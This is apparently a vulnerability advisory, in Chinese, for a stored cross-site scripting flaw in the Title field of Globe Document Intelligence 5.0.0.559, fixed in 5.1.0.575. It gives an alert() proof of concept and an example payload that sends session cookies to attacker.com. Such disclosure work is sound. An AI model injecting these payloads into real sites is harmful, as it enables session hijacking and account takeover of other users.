在 Globe Document Intelligence 平台(版本 5.0.0.559)中发现了一个存储型跨站脚本(XSS)漏洞。 该应用程序未能正确清理或编码新建文档“Title”属性中的用户输入。 当经过身份验证的用户导航到摘要页面(例如,“Task in progress / Recent”)时,恶意载荷会在受害者的浏览器上下文中被反射并执行。
该漏洞允许经过身份验证的攻击者在服务器上存储恶意 JavaScript 代码。
当其他经过身份验证的用户(包括管理员账户)查看受影响的页面时,该脚本会自动执行。
虽然下面的概念验证(PoC)使用良性的 alert() 演示了该漏洞,但攻击者可以将此漏洞武器化,以实现会话劫持和账户接管。
例如,注入类似 <script>fetch('https://attacker.com/?cookie='+encodeURIComponent(document.cookie))</script> 的载荷,会悄无声息地将受害者的会话 Cookie 外泄到攻击者控制的外部服务器。
要复现该漏洞,经过身份验证的攻击者可以执行以下步骤:
<script>alert("XSS")</script>据厂商称,该漏洞已在 5.1.0.575 版本中得到修复。 为修复此问题,建议将 Globe Document Intelligence 平台更新到 5.1.0.575 版本。
本概念验证(PoC)仅供教育和研究目的使用。 本文档中详细描述的信息和代码不得用于恶意活动,也不得在未经系统所有者明确事先授权的情况下针对任何系统使用。作者不承担任何责任,也不对因使用所提供材料而造成的任何滥用或损害负责。